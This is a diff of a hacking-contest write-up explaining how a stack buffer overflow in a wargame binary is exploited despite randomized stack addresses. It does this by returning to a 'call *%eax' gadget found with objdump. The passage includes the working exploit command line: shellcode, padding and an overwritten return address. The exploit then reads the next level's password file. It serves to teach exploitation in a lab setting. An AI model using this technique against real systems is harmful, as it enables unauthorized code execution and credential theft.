janosgyerik/articles/hacking-contest-lessons/level4.md

 the start address of the stack is randomized, making it extremely difficult to guess the right location.

-Luckily for us,
-some interesting details work in our favor:
+There is something else we can try.

-- On 32-bit x86 processors,
+On 32-bit x86 processors,
 a function that returns a pointer value places its result in register `%eax`.
+The result of `strcpy` is the address of the destination, in our case `buf`.

-- `strcpy` is the last call in the function `fun`, so its returned value remains in `%eax` when the function returns.
+And since `strcpy` is the last line in the function, there is nothing else to change the content of `%eax` before the function exits.
+Finally,

-- There are `call *%eax` instructions inside the program, which are suitable jump targets, as they execute the code at the address stored in register `%eax`.
+a `call *%eax` instruction executes the code at the address stored in `%eax`, so if there is any such instruction inside the code, we can use its address:

-That is,
-we can put our shellcode at the start of `buf`, then when `strcpy` returns, the address of `buf` will be saved in `%eax`, and so if we overwrite the return address with any of the `call *%eax` instructions, then our shellcode at the start of `buf` will get executed.

-Find the addresses of `call *%eax` instructions using `objdump`:
 ```
 level03@box:/levels/level04$ objdump -d level04 | grep call.*eax
  8048488:   ff 14 85 1c 9f 04 08    call   *0x8049f1c(,%eax,4)
  80484cf:   ff d0                   call   *%eax
  80485fb:   ff d0                   call   *%eax
 ```
+Thus,
-That's it, we can use either `0x080484cf` or `0x080485fb` as the address to jump to:
+we can use either `0x080484cf` or `0x080485fb` as the address:
 ```
 level03@box:/levels/level04$ ./level04 $EGG$(python -c 'print "A" * 991')$(printf '\xcf\x84\x04\x08')
 /levels/level04 $ cat /home/level04/.password